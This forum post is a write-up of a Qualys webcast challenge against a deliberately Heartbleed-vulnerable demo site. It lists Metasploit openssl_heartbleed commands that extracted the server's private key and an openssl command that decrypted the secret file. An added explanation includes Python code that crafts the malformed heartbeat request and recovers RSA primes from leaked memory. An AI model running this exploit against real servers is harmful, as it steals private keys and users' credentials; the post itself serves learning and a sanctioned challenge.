I hope this is the right place to post this.
Last week Qualys presented on a webcast:
“A Post-Mortem on Heartbleed - What Worked and What Didn't: Real-world case study on how the State of Colorado responded to this critical vulnerability.”
For this presentation they stood up a website that is vulnerable to the Heartbleed bug and put out a challenge to get the private keys, the encrypted file, and decrypt the file for a prize.
Here are the steps I used to get that prize.
Go to the website, register an account and log in to get the "secret file"
--note: don't use a real username or password, because anything you submit to the site can show up in the memory leaked while exploiting the bug.
Register @ https://hbdemo.kandek.com/
After registering on the site and logging in I was able to download the “Secret” encrypted file and save it locally for later.
Next we move on to exploiting the vulnerability in the site.
using metasploit-framework on ubuntu 12.04
> sudo ./msfconsole
> use auxiliary/scanner/ssl/openssl_heartbleed
> set RHOSTS hbdemo.kandek.com
> set RPORT 443
> set VERBOSE true
> set ACTION KEYS
> run
In only a few seconds I had my answer.
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
save file as hbdemo.key
Now decrypt the secret file using the private key.
> cat supersecret.txt.enc | openssl rsautl -decrypt -inkey hbdemo.key
> Darth Vader is Luke's father.
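What the KEYS action is doing behind those few seconds: it sends a heartbeat request whose length field claims far more payload than was sent, the unpatched server answers with that many bytes of its own heap, and the module fetches the server certificate and tests windows of the leaked memory as divisors of the RSA modulus. A hit is one of the primes, and from it the private exponent follows. The block below is an added, offline example of that pipeline; it is not the original post's steps and not Metasploit's code. It constructs the heartbeat framing, a fake response whose "heap" contains a demo prime next to a constructed login request (which is why the note about not using real credentials matters), recovers the factor, and decrypts a PKCS#1 v1.5 ciphertext the way openssl rsautl would. Assumptions: the TLS handshake that must precede the heartbeat is omitted, the key uses two tiny Mersenne primes purely so the arithmetic is readable, and the padding filler is fixed rather than random.

```python
"""Added example (not from the post or Metasploit): Heartbleed heartbeat framing
plus the offline key-recovery step of the KEYS action. All data is constructed."""
import struct

TLS_HEARTBEAT = 0x18          # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
TLS_1_1 = b"\x03\x02"


def build_heartbeat_request(claimed_len, version=TLS_1_1):
    """Malicious heartbeat: a 3-byte message whose payload_length field claims
    `claimed_len` bytes that are never sent. Unpatched OpenSSL (< 1.0.1g) copies
    that many bytes from its heap into the reply."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len)
    return struct.pack("!B2sH", TLS_HEARTBEAT, version, len(body)) + body


def parse_heartbeat_response(record):
    """Return the payload of a heartbeat response record, or b"" for anything
    else (a patched server sends nothing back, or an alert)."""
    if len(record) < 8 or record[0] != TLS_HEARTBEAT:
        return b""
    (rec_len,) = struct.unpack("!H", record[3:5])
    body = record[5:5 + rec_len]
    if len(body) < 3 or body[0] != HB_RESPONSE:
        return b""
    (payload_len,) = struct.unpack("!H", body[1:3])
    return body[3:3 + payload_len]


def find_private_factor(leak, n):
    """Slide windows of every plausible width over the leak, in both byte
    orders (OpenSSL BIGNUMs are little-endian limbs; this demo plants the prime
    big-endian), and test each as a divisor of n. Only p and q can divide an
    RSA modulus non-trivially, so any hit is a private prime."""
    max_width = (n.bit_length() + 7) // 8 - 1
    for width in range(8, max_width + 1):
        for i in range(len(leak) - width + 1):
            for order in ("big", "little"):
                cand = int.from_bytes(leak[i:i + width], order)
                if 1 < cand < n and n % cand == 0:
                    return cand
    return None


def rebuild_private_exponent(n, e, p):
    """Given one prime, derive the other and the private exponent d."""
    q = n // p
    assert p * q == n
    return pow(e, -1, (p - 1) * (q - 1))      # modular inverse, Python 3.8+


def pkcs1_v15_encrypt(n, e, msg):
    """RSA with PKCS#1 v1.5 type-2 padding (what `openssl rsautl` uses).
    Filler bytes are fixed here for reproducibility; real code uses random
    non-zero bytes."""
    k = (n.bit_length() + 7) // 8
    if len(msg) > k - 11:
        raise ValueError("message too long for modulus")
    ps = bytes(0x41 + (i % 26) for i in range(k - 3 - len(msg)))
    em = b"\x00\x02" + ps + b"\x00" + msg
    return pow(int.from_bytes(em, "big"), e, n).to_bytes(k, "big")


def pkcs1_v15_decrypt(n, d, ct):
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(ct, "big"), d, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x02" or b"\x00" not in em[2:]:
        raise ValueError("bad PKCS#1 v1.5 padding")
    return em[em.index(b"\x00", 2) + 1:]


def demo():
    # Demo-only key: Mersenne primes, far too small and structured for real use.
    p, q, e = 2**127 - 1, 2**89 - 1, 65537
    n = p * q
    secret = b"Vader is his dad"            # 16 bytes fits the 27-byte modulus
    ciphertext = pkcs1_v15_encrypt(n, e, secret)

    # Constructed "leaked heap": a login request, filler, the prime p, filler.
    noise = bytes((i * 37) % 256 for i in range(48))
    heap = (b"POST /login user=demo&pass=hunter2 " + noise
            + p.to_bytes(16, "big") + noise[::-1])
    response = (struct.pack("!B2sH", TLS_HEARTBEAT, TLS_1_1, 3 + len(heap))
                + struct.pack("!BH", HB_RESPONSE, len(heap)) + heap)

    leak = parse_heartbeat_response(response)
    factor = find_private_factor(leak, n)
    d = rebuild_private_exponent(n, e, factor)
    return {"p": p, "factor": factor,
            "plaintext": pkcs1_v15_decrypt(n, d, ciphertext)}


if __name__ == "__main__":
    print(build_heartbeat_request(0x4000).hex())
    print(demo())
```

The `find_private_factor` scan is the whole trick: a leaked prime is just 128 or so bytes of heap that happen to divide a number you can read off the public certificate, so no parsing of key structures is needed. Against a patched server `parse_heartbeat_response` returns nothing because no heartbeat response ever arrives.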
The next part was funny, I didn't remember where they said to send the answer to, so I reached out to people I know to ask if they knew Wolfgang and I was able to get his phone number. On his voice mail I was able to get his email address and that is where I sent the answer to. I also posted out to twitter and he responded to me with his email (but I had already sent the answer by that time).
I just want to say thank you to Wolfgang and the Qualys team for doing the webcast and adding a challenge to it also. It made it interactive and fun. I hope they do this more in future webcasts.